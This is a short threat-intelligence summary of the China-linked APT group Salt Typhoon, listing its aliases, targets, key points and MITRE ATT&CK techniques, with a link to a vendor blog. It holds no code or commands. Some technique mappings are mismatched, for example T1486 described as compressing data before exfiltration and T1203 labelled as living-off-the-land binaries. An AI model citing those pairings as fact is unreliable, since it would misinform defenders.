FOCUS MODE
EXTRACT IOC
Interesting Stuff

Salt Typhoon: The Threat Group Behind Major Cyberattacks

iocOne
Salt Typhoon: The Threat Group Behind Major Cyberattacks
Salt Typhoon is an APT group allegedly linked to China’s Ministry of State Security, targeting U.S. infrastructure and government entities with a focus on corporate data theft and espionage. Their operations include advanced techniques and have resulted in numerous breaches, notably in telecom networks and government systems. Affected: US Government agencies, telecommunications, infrastructure, political candidates

Keypoints :

  • Salt Typhoon is an Advanced Persistent Threat group linked to China’s Ministry of State Security.
  • Also known as Ghost Emperor, FamousSparrow, Earth Estrie, and UNC2286.
  • The group has been active since at least August 2019, targeting high-value individuals and U.S. infrastructure.
  • Recent breaches include compromises of multiple U.S. telecom networks.
  • Salt Typhoon employs espionage tactics over disruption, focusing on data exfiltration.
  • Utilizes both Living Off the Land Binaries and custom tools like ‘JumbledPath’.
  • Sanctions were imposed on a related Chinese organization, Sichuan Juxinhe Network Technology.
  • Employs advanced techniques for stealthy network infiltration and information gathering.
  • Common TTPs include abuse of LOLBins, command execution via WMI, and exploitation of vulnerabilities in well-known software.
  • Important to have robust security measures and incident response plans against such threats.

MITRE Techniques :

  • Abuse Elevation Control Mechanism (T1548) – Utilizes tools such as Mimikatz and CobaltStrike for privilege escalation.
  • Living Off the Land Binaries (T1203) – Employs BITSAdmin, CertUtil, and PowerShell for executing operations.
  • Remote File Copy (T1105) – Uses “copy.exe” and “.cab” files for payload delivery and storage.
  • Command-Line Interface (T1059) – Execution of batch scripts for various malicious activities.
  • Data Encrypted for Impact (T1486) – Compresses sensitive data using rar.exe before exfiltration.
  • Exploitation of Public-Facing Applications (T1190) – Exploited vulnerabilities in Ivanti Secure Connect VPN and Microsoft Exchange.

Full Story: https://www.varonis.com/blog/salt-typhoon

Tags: EXFILTRATION, WINDOWS, LATERAL MOVEMENT, PERSISTENCE, CREDENTIAL, CHINA, PROXY, LEARN